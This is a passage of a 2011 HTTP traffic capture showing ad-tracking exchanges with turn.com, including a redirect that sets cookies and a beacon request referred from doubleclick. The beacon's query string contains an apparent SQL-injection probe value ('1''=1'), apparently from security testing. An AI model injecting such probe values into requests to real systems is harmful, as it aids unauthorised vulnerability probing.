Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr36hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:44 GMT; Path=/
Set-Cookie: pf=HI1kW9dDuzsAawNB3xfEnPgJlEfmrZSLb2NQk53Jdt9pZRM3I2Ow27XFAiLSy6gtZDpM35cC-2bkiEEmtUQhePVJa14KJhbEu9o3nKnVB4nX05cOjEpT2HyHBma2S3H4q-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdNChmr2gqp_bsTKTrtZC7Y3cLD_SNDEbV8PMUFlmzT1N9YPgaemwV3BBfB2-m9t7qefjWJ08BK2ctlCFJWHllBcY00BkCo-YMNBmpIV0ZOtg-Nxhuomzdm6hE0tcxs0HIGvNZ_9yaKOud870irbVUKqwOqoRBUYoZ_aUn4XStK87HYLNjBqQu5e4uk0BeNmDUKcNEfcAeYlISy2E23H0Ey0RTtdyXjRdrIljs2JT4IBCp42oZQTOhvc81rn-hYQRZnDf7y9COK-FY-2ugXVqjQS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtdhPG7W45xYyr6F0BCB3Y3jIYuZQwHeZWSJ7L_4jNc_fcy8Q5Fz6SgXPEIAbAI8Ia43mIE2YKEWi-B1LzswOG8tiMF6xinJIIFkTYszxV8xxVqy4iGInEgJLf3DRUumLHOXbNBGeqtHrtmsNUfxy0oJ5OXAKNQ1n-dyOqIH5RV7O5q2tR0Aw1HwdNZZVS9ryqsqXuaGow2-P7K3E6seeRdID7U4lziJVOheqyzs6aPfQpaefMGOCvGovGjA2C6kGk6qDVb8Ctumm-g06ANh58ShZXS85UlTI-Ms8315rZDyMXvc1WWsvixV9w_JwyrchfF403Xtt73ImjClAHeFE527hZ9sYYolc0xNkbs21o9RHXdT108p4cswCVHF9aJXWu46W3EfgdIzTSDASgBHY-_d87UupVePEsgR-UIuzJKKpX0bxLcq_C7AWUMkXDWLJlvjquWC7Gk8YZnpPdByut-OS1jPhEo7rRlyzkCvvr2ak_dIgdlxoHfpwnS_HG4q3Ex0bQgW10uuAOxZq7T6pargjZ91aET7gu1wHxeczq5nxznV9VyZYSWSGOlzD0OagD_qxPuFg7pTdahuj804NF4RwpfxyO8MinPH6Qe4MZA9Ca5rVVPm7uyji591PMj93X-XVtndwLXwwX42fVwVpALmt1-V8hJ2wLngXVcwmpJcmIVvr-UGtnHjdubqHJRmWt2ucOMTnegTPjwuur0G3GFJ3s_1jLC37hD3a7XYeOxJDJd9fJMJZV8ay1vizL8GtAwugm4v0Cxwh4L6eS4moQ1bjXF1tj7JMOrQdTUwyOTILZIr1D_ZNf38Z-XJwgGExQHTvWHwHTF6ZvpeTqw9vx7ZteHdharQ8kdaCxkUnsg0m5bzcb7E4YgboOUnmZLh-LKm7oV7a2G__-JxYjis-sAaLoAMwpDwQwfc69gRpYn_y7-ZD75er7BUydw547KPtbXosP9bnnd0OZLFPEX78KsyR75gjh4XIZOCPW3r_hr7AcJ3ngTaN4teEYEORDeDj4g3rZ7rDDNT6U0ZCXY4sSAUxf97koNRHrmwTXDEXbACeL4CjKRNvO1XFYCJkVXlDj6xX2UKsUIMQFup1JBC3sqAlwwL9bpfkuhDHdXYKRG9_5RzwHK6FKcS7w1cxEVEDeUPLyJsufYvZN1YPHO-OvVi5FCnRJS-gZ_0m2w3Vv462a0R7DEvhubXRx78mLhvin04_PDzQA62eGzSyPpa5D8VoVL3nYT-8Na4x0ynR4fvinviFGMLv3tNjtrp7smlbrsTcekN1EBAA1tKK3vI_26Aexhdo9ejFCDobEVyhNvVqJQinyqTP5l-pke17GNYuVES9bgQO-70qoZt975PqpkGES5gmUY80_gzDQabSIGDx8NGTMtFXAXF4KcPnlEt4B1_FhhxOiLtoiA3m7onhzh-TJc88tEfwDGbxnH_j1h-NtVFTKdRNhtT0fDJE-__QeonnnzZXsc9K80-WU_VLBsdQNA2PYXH3Rff0knxJcVZ7Chz4FJJ_TMv03yL7XPeYtr4s0GKf3t057ZF4_jL2ifoo0t0noToysMQ98IGemf7gcP8sUOs_epJQ8gyIjVMYX2SuE1jSJBqGoTNfCkFA_1FMJLxHxDTLD68RZNW115CcBbPNgZZKRiXKaLKD62rQnfDWK35o0A7w8jrj3wOje0h3VO65HFl2Qkz1aQHw1bkZ4UQ7kl9hQMcyi_uXiusieb9oqny7NzWYCf6XmrNS7dZQ8PQj4xieKYCskpNEszFxo3mJb3L1KuEkRg2vcFf06O; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:44 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:43 GMT

Request 2

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid=&1''=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; 